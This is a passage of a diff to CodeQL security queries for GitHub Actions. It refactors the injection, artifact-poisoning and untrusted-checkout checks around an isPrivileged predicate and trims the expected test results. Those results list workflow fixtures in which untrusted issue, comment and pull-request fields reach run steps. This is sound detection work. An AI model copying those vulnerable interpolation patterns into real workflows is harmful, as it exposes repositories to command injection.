w.getATriggerEvent() = t | t) = 1 -} - -from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, Workflow w +from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink where EnvVarInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 826a3b41e380..de60141bb400 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -17,7 +17,16 @@ import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink -where CommandInjectionFlow::flowPath(source, sink) +where + CommandInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql index 2f9a09f59c38..bbfb226ecd1c 100644 --- a/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql +++ b/ql/src/Security/CWE-078/PrivilegedCommandInjection.ql @@ -16,16 +16,13 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Workflow w +from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink where CommandInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index f71c178822cb..dc28cc2569ff 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -19,7 +19,16 @@ import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink -where CodeInjectionFlow::flowPath(source, sink) +where + CodeInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 62030e322633..9814df091dd7 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -18,16 +18,13 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Workflow w +from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where CodeInjectionFlow::flowPath(source, sink) and - w = source.getNode().asExpr().getEnclosingWorkflow() and - not isSingleTriggerWorkflow(w, "pull_request") + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) select sink.getNode(), source, sink, "Potential privileged code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b71a64d52e4..5d38faa94df5 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,27 +14,9 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - -from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run +from LocalJob job, ArtifactDownloadStep download, Step run where - w = job.getWorkflow() and - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + job.getWorkflow().isPrivileged() and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 86b80c672157..40f6d2fec9e6 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -121,26 +121,9 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | w.getATriggerEvent() = t | t) = 1 -} - from Workflow w, PRHeadCheckoutStep checkout where - ( - // The Workflow is triggered by an event other than `pull_request` - not isSingleTriggerWorkflow(w, "pull_request") - or - // The Workflow is only triggered by `workflow_call` and there is - // a caller workflow triggered by an event other than `pull_request` - isSingleTriggerWorkflow(w, "workflow_call") and - exists(ExternalJob call, Workflow caller | - call.getCallee() = w.getLocation().getFile().getRelativePath() and - caller = call.getWorkflow() and - not isSingleTriggerWorkflow(caller, "pull_request") - ) - ) and + w.isPrivileged() and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 2d96ec5a4352..d5dbcbde0869 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index decabad082fb..99ebb1edc05d 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -3,4 +3,3 @@ nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1fad288860e7..6cb2c1ed3992 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -209,92 +209,5 @@ nodes | action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. 